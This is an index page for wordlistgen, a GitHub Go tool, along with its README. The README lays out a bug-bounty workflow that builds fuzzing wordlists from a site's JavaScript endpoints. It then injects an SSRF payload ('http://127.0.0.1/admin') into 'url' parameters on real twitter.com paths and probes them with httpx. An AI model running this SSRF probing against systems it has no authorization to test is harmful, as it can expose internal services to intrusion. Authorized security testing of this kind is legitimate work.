Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/ethicalhackingplayground/wordlistgen
Generates target specific word lists for Fuzzing with fuff
https://github.com/ethicalhackingplayground/wordlistgen
Last synced: about 1 month ago
JSON representation
Generates target specific word lists for Fuzzing with fuff
- Host: GitHub
- URL: https://github.com/ethicalhackingplayground/wordlistgen
- Owner: ethicalhackingplayground
- Created: 2020-09-02T12:26:25.000Z (over 4 years ago)
- Default Branch: master
- Last Pushed: 2020-09-02T13:18:13.000Z (over 4 years ago)
- Last Synced: 2024-08-05T17:25:10.222Z (4 months ago)
- Language: Go
- Size: 556 KB
- Stars: 108
- Watchers: 4
- Forks: 16
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
- awesome-hacking-lists - ethicalhackingplayground/wordlistgen - Generates target specific word lists for Fuzzing with fuff (Go)
README
# wordlistgen
Generates target specific word lists by searching for endpoints in javascript and appends parameters for Fuzzing with other tools
**Version 1.0**
### Install
**`$ go get -u github.com/ethicalhackingplayground/wordlistgen`**
**`$ go get github.com/003random/getJS`**
### Generate wordlist
**`$ echo "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "https://www.twitter.com"`**
The use ffuf
**Then get creative with FFuF or https://github.com/tomnomnom/qsreplace**
****
### SSRF TIP2:
#### Generate Wordlist
**`$ cat | getJS -complete | ./wordlistgen -p params.txt -d | tee wordlist`**
**`$ cat "https://www.twitter.com" | getJS -complete | ./wordlistgen -p params.txt -d "www.twitter.com" | tee wordlist`**
```
OUTPUT:
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=FUZZ
www.twitter.com/v/latest/72x72//?url=FUZZ
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=FUZZ
www.twitter.com/articles/18311/?url=FUZZ
```
###### You can also use `-dL` to load a list of subdomains like:
**`$ cat | getJS -complete | ./wordlistgen -p params.txt -dL | tee wordlist`**
##### Replace Variables with Payload
**`$ cat wordlist | qsreplace http://127.0.0.1/admin | tee -a hosts`**
```
OUTPUT:
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/polyfills.525f28f5.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/v/latest/72x72//?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/responsive-web-internal/sourcemaps/client-web-legacy/en.363b7e25.js.map/?url=http%3A%2F%2F127.0.0.1%2Fadmin
www.twitter.com/articles/18311/?url=http%3A%2F%2F127.0.0.1%2Fadmin
```
#### Use HTTPX to keep track of the codes,titles
**`$ cat hosts | httpx -title -status-code`**
#### I hope you get a bounty with this technique.
****
**If you get a bounty please support by buying me a coffee**
